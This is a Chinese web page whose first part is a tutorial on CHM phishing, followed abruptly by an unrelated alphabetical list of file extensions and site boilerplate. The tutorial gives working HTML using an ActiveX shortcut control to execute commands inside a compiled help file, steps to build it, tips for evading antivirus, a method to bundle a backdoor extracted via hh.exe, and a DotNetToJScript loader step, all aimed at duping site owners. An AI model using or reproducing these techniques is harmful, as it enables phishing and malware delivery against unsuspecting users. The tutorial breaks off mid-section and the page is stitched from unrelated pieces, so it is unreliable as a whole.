黑客必會的CHM釣魚操作，你明白了嗎？

、CHM釣魚

進(jìn)行釣魚選擇合適的payload非常重要，使用一些容易讓人放松警惕的文件格式可以大大提高釣魚的成功率。CHM是微軟推出的基于HTML的幫助文件系統(tǒng)，被 IE 瀏覽器支持的JavaScript, VBScript, ActiveX,等，CHM同樣支持。因此使用CHM作為釣魚的payload非常合適。

上述的總體意思就是，可以讓更多站長上當(dāng)，這里充分了利用到了社會工程學(xué)

1）、使用com控件命令執(zhí)行

根據(jù)@ithurricanept的推特

使用了js啟動com控件執(zhí)行命令

原始碼如下：

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

POC

使用HTML幫助研討會

創(chuàng)建一個(gè)新的項(xiàng)目，添加文件后進(jìn)行編譯

選擇新

記住這里千萬不要打勾

隨便輸入記住帶.hpp后綴

隨便選擇一個(gè)

然后選擇new之后選擇HTML文件

然后輸入我們剛才的poc

寫完之后ctrl + s保存

記住保存的地址

然后點(diǎn)擊這個(gè)

選擇添加把我們剛寫的文件添加進(jìn)去

然后點(diǎn)擊ok

隨后點(diǎn)擊這個(gè)

得到地址去訪問。發(fā)現(xiàn)便執(zhí)行了命令

利用

實(shí)際測試的時(shí)候注意了以下幾點(diǎn)：

執(zhí)行命令的時(shí)候注意預(yù)定的參數(shù)與程序名需要用逗號替換，參數(shù)與參數(shù)之間不需要。

考慮到進(jìn)行敏感操作會導(dǎo)致殺軟提示，因此應(yīng)避免使用powershell，bitsadmin，certutil，cscript等。

通過cmd執(zhí)行命令也屬于敏感操作，因此使用多個(gè)控件依次執(zhí)行命令。

在搜索的過程中發(fā)現(xiàn).chm文件的替換程序hh.exe具有反編譯功能（反編譯，將chm返回成html，其實(shí)就類似chm可以比喻成一個(gè)壓縮包，decompile是解壓縮）的功能，可以將打包進(jìn)chm的文件釋放出來

HH.EXE -decompile D:/xTemp/decompile-folder C:/xTemp/XMLconvert.chm

hh -decompile目標(biāo)文件夾源CHM文件名

這句話的意思

因此可以將后門程序一起打包進(jìn)chm文件中，運(yùn)行時(shí)調(diào)用hh.exe釋放chm中的后門程序再執(zhí)行。

測試：

使用360測試的時(shí)候效果不太理想，在聯(lián)網(wǎng)情況下使用hh.exe反編譯會被攔截，斷網(wǎng)情況下沒有問題。

使用火絨測試沒有任何攔截。

3、使用js加載.net

既然可以利用chm執(zhí)行js，那為什么不內(nèi)嵌.net和dll呢？

POC

編寫一個(gè).net dll

namespace ClassLibrary1{    public class Class1    {        public Class1()        {            /* Start notepad */			Process.Start("notepad.exe");        }    }}

生成js腳本

DotNetToJScript.exe -o 1.js ClassLibrary1.dll -c ClassLibrary1.Class1

一篇文章講了一些電腦常用的后綴名即擴(kuò)展名，這篇文章就來給大家提供一個(gè)大全。首先聲明這篇文章不是我原創(chuàng)，是借鑒的其他電腦方面大神的總結(jié)匯總，可以說是擴(kuò)展名、后綴名的大全了，不得不佩服，好多格式我都沒見過，請查收：（如有侵權(quán)請聯(lián)系我刪除，謝謝！）

按照字母順序排列：

A開頭：

ACE：Ace壓縮檔案格式；

ACT：Microsoft office助手文件；

AIF，AIFF：音頻互交換文件，Silicon Graphic and Macintosh應(yīng)用程序的聲音格式；

ANI：Windows系統(tǒng)中的動畫光標(biāo)；

ARC：LH ARC的壓縮檔案文件；

　　ARJ：Robert Jung ARJ壓縮包文件；

　　ASD：Microsoft Word的自動保存文件；

　　ASF：Microsoft高級流媒體格式文件；

　　ASM：匯編語言源文件，Pro/E裝配文件；

　　ASP：動態(tài)網(wǎng)頁文件 ProComm Plus安裝與連接腳本文件 Astound介紹文件；

　　AST：Astound多媒體文件 ClarisWorks"助手"文件；

　　Axx：ARJ壓縮文件的分包序號文件，用于將一個(gè)大文件壓至幾個(gè)小的壓縮包中（xx代表01-99的數(shù)字）；

　　A3L：Authorware 3.x庫文件；

　　A4L：Authorware 4.x庫文件；

　　A5L：Authorware 5.x庫文件；

　　A3M，A4M：Authorware Macintosh未打包文件；

　　A3W，A4W，A5W：未打包的Authorware Windows文件；

B開頭：

　　BAK：備份文件；

　　BAS：BASIC源文件；

　　BAT：批處理文件；

　　BIN：二進(jìn)制文件；

　　BINHex：蘋果的一種編碼格式；

　　BMP：Windows或OS/2位圖文件；

　　BOOK：Adobe FrameMaker Book文件；

　　BOX：Lotus Notes的郵箱文件；

　　BPL：Borlard Delph 4打包庫；

　　BSP：Quake圖形文件；

　　BUN：CakeWalk 聲音捆綁文件（一種MIDI程序）；

C開頭：（最多）

　　C0l：臺風(fēng)波形文件；

　　CAB：Microsoft壓縮檔案文件；

　　CAD：Softdek的Drafix CAD文件；

　　CAM：Casio照相機(jī)格式；

　　CAP：壓縮音樂文件格式；

　　CAS：逗號分開的ASCⅡ文件；

　　CCB：Visual Basic動態(tài)按鈕配置文件；

　　CCH：Corel圖表文件；

　　CCO：CyberChat數(shù)據(jù)文件；

　　CCT：Macromedia Director Shockwave投影；

　　CDA：CD音頻軌道；

　　CDF：Microsoft頻道定義格式文件；

　　CDI：Philip的高密盤交互格式；

　　CDM：Visual dBASE自定義數(shù)據(jù)模塊文件；

　　CDR：CorelDRAW繪圖文件原始音頻CD數(shù)據(jù)文件；

　　CDT：CorelDRAW模板；

　　CDX：CorelDRAW壓縮繪圖文件 Microsoft Visual FoxPro索引文件；

　　CFG：配置文件；

　　CGI：公共網(wǎng)關(guān)接口腳本文件；

　　CGM：計(jì)算機(jī)圖形元文件；

　　CH：OS/2配置文件；

　　CHK：由Windows磁盤碎片整理器或磁盤掃描保存的文件碎片；

　　CHM：編譯過的HTML文件；

　　CHP：Ventura Publisher章節(jié)文件；

　　CHR：字符集（字體文件）；

　　CHT：ChartViem文件 Harvard Graphics矢量文件；

　　CIF：Adaptec CD 創(chuàng)建器 CD映像文件；

　　CIL：Clip Gallery下載包；

　　CIM：SimCity 2000文件；

　　CIN：OS/2改變控制文件用于跟蹤INI文件中的變化；

　　CLASS：Java類文件；

　　CLP：Windows 剪貼板文件；

　　CLL：Crick Software Clicker文件；

　　CLS：Visual Basic類文件；

　　CMD：Windows NT，OS/2的命令文件 DOS CD/M命令文件 dBASEⅡ程序文件；

　　CPI：Microsoft MS-DOS代碼頁信息文件；

　　CPL：控制面板擴(kuò)展名，Corel顏色板；

　　CPP：C++代碼文件；

　　CPR：Corel提供說明書文件；

　　CPT：Corel 照片-繪畫圖像；

　　CST：Macromedia Director Cast文件；

　　CUR：Windows光標(biāo)文件；

D開頭：

　　DBF：dBASE文件，可用數(shù)據(jù)文件（能被Excel97打開） Oracle 8.1.x表格空間文件

　　DBX：DataBearn圖像 Microsoft Visual FoxPro表格文件；

　　DCT：Microsoft Visual FoxPro數(shù)據(jù)庫容器；

　　DCU：Delphi編譯單元文件；

　　DCX：Microsoft Visual FoxPro數(shù)據(jù)庫容器基于PCX的傳真圖像宏；

　　DIR：MacromediaDirector文件；

　　DLL：動態(tài)鏈接庫；

　　DOC：Word文檔文件；

　　DOT：Microsoft Word文檔模板；

　　DPL：Borland Delph 3壓縮庫；

　　DRV：驅(qū)動程序；

　　DRW：Micrografx Designer/Draw Pro/E繪畫文件；

　　DSF：Micrografx Designer VFX文件；

　　DSG：DOOM保存的文件；

　　DSM：Dynamic Studio音樂模塊（MOD）文件；

　　DSP：Microsoft Developer Studio工程文件；

　　DSQ：Corel QUERY（查詢）文件；

　　DST：刺繡機(jī)圖形文件；

　　DSW：Microsoft Developer Studio工作區(qū)文件；

　　DTA：World Bank（世界銀行）的STARS數(shù)據(jù)文件；

　　DTD：SGML文檔類型定義（DTD）文件；

　　DTED：地面高度數(shù)字?jǐn)?shù)據(jù)（圖形的數(shù)據(jù)格式）文件；

　　DTF：Symantec Q&A相關(guān)的數(shù)據(jù)庫數(shù)據(jù)文件；

　　DTM：DigiTrakker模塊文件；

　　DUN：Microsoft拔號網(wǎng)絡(luò)導(dǎo)出文件；

　　DV：數(shù)字視頻文件（MIME）；

　　DWG：AutoCAD工程圖文件 AutoCAD或Generic CADD老版本的繪圖格式；

　　DXR：Macromedia Director受保護(hù)（不可編輯）電影文件；

E開頭：

　　EDA：Ensoniq ASR磁盤映像；

　　EDD：元素定義文檔（FrameMaker+SGML文檔）；

　　EDE：Ensoniq EPS磁盤映像；

　　EDK：Ensoniq KT磁盤映像；

　　EDQ：Ensoniq SQ1/SQ2/Ks32磁盤映像；

　　EDS：Ensoniq SQ80磁盤映像；

　　EDV：Ensoniq VFX-SD磁盤映像；

　　EFA：Ensoniq ASR文件；

　　EFE：Ensoniq EPS文件；

　　EFK：Ensoniq KT文件；

　　EFQ：Ensoniq SQ1/SQ2/Ks32文件；

　　EFS：Ensoniq SQ80文件；

　　EFV：Ensoniq VFX-SD文件；

　　EMD：ABT擴(kuò)展模塊；

　　EMF：Windows增強(qiáng)元文件；

　　EML：Microsoft Outlook Express郵件消息（MIME RTC822）文件；

　　EXE：可執(zhí)行文件或程序；

F開頭

　　FAV：Microsoft Outlook導(dǎo)航條；

　　FAX：傳真類型圖像；

　　FCD：虛擬CD-ROM；

　　FDF：Adobe Acrobat表單文檔文件；

　　FLA：Macromedia Flash電影；

　　FND：Microsoft Explorer保存的搜索文件（Find applet）；

　　FON：系統(tǒng)字體；

　　FRT：Microsoft FoxPro報(bào)表文件；

　　FRX：Visual Basic表單文本 Microsoft FoxPro報(bào)表文件；

　　FXP：經(jīng)Microsoft FoxPro編譯的源文件；

G開頭：

　　GDM：鈴聲、口哨聲和聲音板模塊格式；

　　GetRight：GetRight未完成的下載文件；

　　GHO：Norton 克隆磁盤映像；

　　GID：Windows 95全局索引文件（包括幫助狀態(tài)）；

　　GIF：CompuServe位圖文件；

　　GL：動畫格式；

　　GRP：程序管理組；

H開頭：

　　HEX：Macintosh BinHex2.0文件；

　　HLP：Windows幫助文件；

　　HPP：C++程序頭文件；

　　HQX：Macintosh BinHex 4.0文件；

　　HT：HyperTerminal（超級終端）；

　　HTM，HTML：超文本文檔；

　　HTT：Microsoft超文本模板；

　　HTX：擴(kuò)展HTML模板；

I開頭：

　　ICO：Windows圖標(biāo)；

　　IDX：Microsoft FoxPro相關(guān)數(shù)據(jù)庫索引文件 Symantec Q&A相關(guān)數(shù)據(jù)庫索引文件；

　　Express文件；

　　IMG：GEM映像；

　　INF：信息文件；

　　INI：初始化文件；

　　INP：Oracle 3.0版或早期版本的表單源代碼；

　　INRS：INRS遠(yuǎn)程通信聲頻；

　　INS：InstallShield安裝腳本 X-Internet簽字文件；

　　INT：中間代碼，當(dāng)一個(gè)源程序經(jīng)過語法檢查后編譯產(chǎn)生一個(gè)可執(zhí)行代碼；

　　IOF：Findit文檔；

　　IQY：Microsoft Internet查詢文件；

　　ISO：根據(jù)ISD 9660有關(guān)CD-ROM文件系統(tǒng)標(biāo)準(zhǔn)列出CD-ROM上的文件；

　　ISP：X-Internet簽字文件；

　　IST：數(shù)字跟蹤設(shè)備文件；

　　ISU：InstallShield卸裝腳本；

　　IT：脈沖跟蹤系統(tǒng)音樂模塊（MOD）文件；

　　ITI：脈沖跟蹤系統(tǒng)設(shè)備；

　　ITS：脈沖跟蹤系統(tǒng)抽樣，Internet文檔位置；

　　IV：Open Inventor中使用的文件格式；

　　IVD：超過20/20微觀數(shù)據(jù)維數(shù)或變量等級文件；

　　IVP：超過20/20的用戶子集配置文件；

　　IVT：超過20/20表或集合數(shù)據(jù)文件；

　　IVX：超過20/20微數(shù)據(jù)目錄文件；

　　IW：Idlewild屏幕保護(hù)程序；

　　IWC：Install Watch文檔；

J開頭

　　J62：Ricoh照相機(jī)格式；

　　JAR：Java檔案文件（一種用于applet和相關(guān)文件的壓縮文件）；

　　JAVA：Java源文件；

　　JAR：Java檔案文件（一種用于applet和相關(guān)文件的壓縮文件）；

　　JAVA：Java源文件；

　　JFF，JFIF，JIF：JPEG文件；

　　JPE，JPEG，JPG：JPEG圖形文件；

　　JS：javascript源文件；

　　JSP：HTML網(wǎng)頁，其中包含有對一個(gè)Java servlet的參考；

K開頭：

　　KAR：卡拉OK MIDI文件（文本+MIDI）；

L開頭：

　　LAB：Visual dBASE標(biāo)簽文件；

　　LBT，LBX：Microsoft FoxPro標(biāo)簽文件；

　　LDB：Microsoft Access加鎖文件；

　　LHA：LZH更換文件后綴；

　　LOG：日志文件；

　　LZH：LH ARC壓縮檔案；

M開頭：

　　M1V：MPEG相關(guān)文件（MIME"mpeg"類型）；

　　M3D：Corel Motion 3D動畫文件；

　　M3U：MPEG URL（MIME聲音文件）；

　　MAM：Microsoft Access宏；

　　MAQ：Microsoft Access查詢文件；

　　MAR：Microsoft Access報(bào)表文件；

　　MBX：Microsoft Outlook保存email格式；

　　MCW：Microsoft Word的Macintosh文檔；

　　MDB：Microsoft Access數(shù)據(jù)庫；

　　MDN：Microsoft Access空數(shù)據(jù)庫模板；

　　MDW：Microsoft Access工作組文件；

　　MID：MIDI音樂；

　　MMM：Microsoft多媒體電影；

　　MOV：QuickTime for Windows電影；

　　MP2：第二層MPEG音頻文件；

　　MP3：第三層MPEG音頻文件；

　　MPA：MPEG相關(guān)文件，MIME"mpeg類型"；

　　MPE，MPEG，MPG：MPEG動畫文件；

　　MPP：Microsoft工程文件 CAD繪圖文件格式；

　　MPR：Microsoft FoxPro菜單（已編譯）；

　　MSI：Windows 安裝器包；

　　MSN：Microsoft 網(wǎng)絡(luò)文檔 Descent Mission文件；

O開頭：

　 OBD：Microsoft Office活頁夾；

　　OBJ：對象文件；

　　OBZ：Microsoft Office活頁夾向?qū)В?/p>

　　OCX：Microsoft對象鏈接與嵌入定制控件；

　　ODS：Microsoft Outlook Express郵箱文件；

　　OFT：Microsoft Outlook模板；

　　OPX：OPL擴(kuò)展DLL（動態(tài)鏈接庫）；

　　OSS：Microsoft Office查找文件；

　　OST：Microsoft Exchange / Outlook 離線文件；

P開頭：

　　PAL：壓縮文件；

　　PART：Go！Zilla部分下載文件；

　　PAS：Pascal源代碼；

　　PCS：PICS動畫文件；

　　PDF：可導(dǎo)出文檔格式文件（可用Web瀏覽器顯示） Microsoft系統(tǒng)管理服務(wù)器包定義文件；

　　PHP，PHP3：包含有PHP腳本的HTML網(wǎng)頁；

　　PHTML：包含有PHP腳本的HTML網(wǎng)頁由Perl分析解釋的HTML；

　　PM5：Pagemaker 5.0文件；

　　PM6：Pagemaker 6.0文件；

　　PPS：Microsoft Powerpoint幻燈片放映；

　　PPT：Microsoft Powerpoint演示文稿；

　　PRF：Windows系統(tǒng)文件，Macromedia導(dǎo)演設(shè)置文件；

　　PSD：Adobe photoshop位圖文件；

　　PSM：Protracker Studio模型格式 Epic游戲的源數(shù)據(jù)文件；

　　PST：Microsoft Outlook個(gè)人文件夾文件；

　　PWL：Windows 95口令列表文件；

Q開頭：

　　QIF：QuickTime相關(guān)圖像（MIME） Quicken導(dǎo)入文件；

　　QT，QTM：QuickTime電影；

　　QTI，QTIF：QuickTime相關(guān)圖像；

　　QTP：QuickTime優(yōu)先文件；

　　QTS：Mac PICT圖像文件 QuickTime相關(guān)圖像；

　　QTX：QuickTime相關(guān)圖像；

R開頭：

　　RA：RealAudio聲音文件；

　　RAM：RealAudio元文件；

　　RAR：RAR壓縮檔案（Eugene Roshall格式）；

　　REC：錄音機(jī)宏 RapidComm聲音文件；

　　REG：注冊表文件；

　　REP：Visual dBASE報(bào)表文件；

　　RES：Microsoft Visual C++資源文件；

　　RM：RealAudio視頻文件；

　　RMF：Rich Map格式；

　　ROM：基于盒式磁帶的家庭游戲仿真器文件；

　　Rxx：多卷檔案上的RAR壓縮文件（xx代表1～99間的一個(gè)數(shù)字）；

S開頭：

　　SAV：游戲保存文件；

　　SB：原始帶符號字節(jié)（8位）數(shù)據(jù)；

　　SBK：Creative Labs的Soundfont 1.0 Bank文件（Soundb laster）/EMU SonndFont v1.x Bank文件；

　　SBL：Shockwave Flash對象文件；

　　SCF：Windows Explorer命令文件；

　　SCH：Microsoft Schedule+1；

　　SCP：撥號網(wǎng)絡(luò)腳本文件；

　　SCR：Windows屏幕保護(hù) 傳真圖像腳本文件；

　　SFX：RAR自解壓檔案；

　　SHTML：含有服務(wù)器端包括（SSI）的HTML文件；

　　SPL：Shockwave Flash對象 DigiTrakker抽樣；

　　SQL：Informix SQL查詢通常被數(shù)據(jù)庫產(chǎn)品用于SQL查詢（腳本、文本、二進(jìn)制）的文件擴(kuò)展名；

　　STM：.shtml的短后綴形式，含有一個(gè)服務(wù)端包括（SSI）的HTML文件 Scream Tracker V2音樂模塊（MOD）文件；

　　STR：屏幕保護(hù)文件；

　　SWA：在Macromedia導(dǎo)演文件（MP3文件）中的Shockwave聲音文件；

　　SYS：系統(tǒng)文件；

T開頭：

　　T64：Commodore 64仿真器磁帶映像文件；

　　THEME：Windows 95桌面主題文件；

　　TIF，TIFF：標(biāo)簽圖像文件格式（TIFF）位圖；

　　TMP：Windows臨時(shí)文件；

　　TRM：終端文件；

　　TXT：ASCⅡ文本格式的聲音數(shù)據(jù)；

　　TZ：老的壓縮格式文件；

V開頭：

　　VBA：VBase文件；

　　VBP：Microsoft Visual Basic工程文件；

　　VBW：Microsoft Visual Basic工作區(qū)文件；

　　VBX：Microsoft Visual Basic用戶定制控件；

　　VQE，VQL：Yamaha Sound-VQ定位器文件；

　　VQF：Yamaha Sound-VQ文件（可能出現(xiàn)標(biāo)準(zhǔn)）；

　　VRF：Oracle 7配置文件；

　　VSL：下載列表文件（GetRight）；

W開頭：

　　WAB：Microsoft Outlook文件；

　　WAD：包含有視頻、玩家水平和其他信息的DOOM游戲的大文件；

　　WAL：Quake 2正文文件；

　　WAV：Windows波形聲形；

　　WBK：Microsoft Word備份文件；

　　WFM：Visual dBASE Windows表單；

　　WFN：在CorelDRAW中使用的符號；

　　WIZ：Microsoft Word向?qū)В?/p>

　　WRL：虛擬現(xiàn)實(shí)模型；

　　WWL：Microsoft Word內(nèi)插器文件；

X開頭：

　　XLK：Microsoft Excel備份；

　　XLL：Microsoft Excel內(nèi)插器文件；

　　XLM：Microsoft Excel宏；

　　XLS：Microsoft Excel工作單；

　　XLT：Microsoft Excel模板；

　　XLV：Microsoft Excel VBA模塊；

　　XLW：Microsoft Excel工作簿/工作區(qū)；

Z開頭：

　　ZAP：Windows軟件安裝配置文件；

　　ZIP：Zip文件；

數(shù)字開頭：

　　000-999：用于為老版本（或備份）文件編號（比如：被安裝程序改變的CONFIG.SYS文件）又可用于為小范圍的PC應(yīng)用程序的多個(gè)用戶相關(guān)數(shù)據(jù)文件編號；

　　12M：Lotus 1-2-3 97 SmartMaster文件；

　　123：Lotus 1-2-3 97文件；

　　2D：VersaCAD的2維繪畫文件；

　　2GR，3GR：在Windows之下的VGA圖形驅(qū)動程序/配置文件；

　　386：在386或更高級處理器上使用的文件；

　　3D：VersaCAD的3維繪畫文件；

　　3DM：3D NURBS建模器；

　　3DS：3D Studio（DOS下）格式文件；

　　4GE：Informix 4GL編譯后代碼；

4GL：Informix 4GL源代碼。

好了，以上就是文件擴(kuò)展名即后綴名的大全了，我也做了一回知識的搬運(yùn)工，就是不知道這樣算不算抄襲呢？各大發(fā)文平臺會不會判我違規(guī)？也無所謂了，我的目的是讓更多的人看到和學(xué)習(xí)，能夠幫助更多的人，只要能達(dá)到這個(gè)目標(biāo)，其他的都不重要了。

在線咨詢

上一篇：HTML常用英文單詞，快來背單詞吧
下一篇：加載機(jī)制：App和Web分別的加載原理&加載方案設(shè)計(jì)

您的項(xiàng)目需求

*請認(rèn)真填寫需求信息，我們會在24小時(shí)內(nèi)與您取得聯(lián)系。

整合營銷服務(wù)商

黑客必會的CHM釣魚操作，你明白了嗎？

POC

利用

3、使用js加載.net

POC

您的項(xiàng)目需求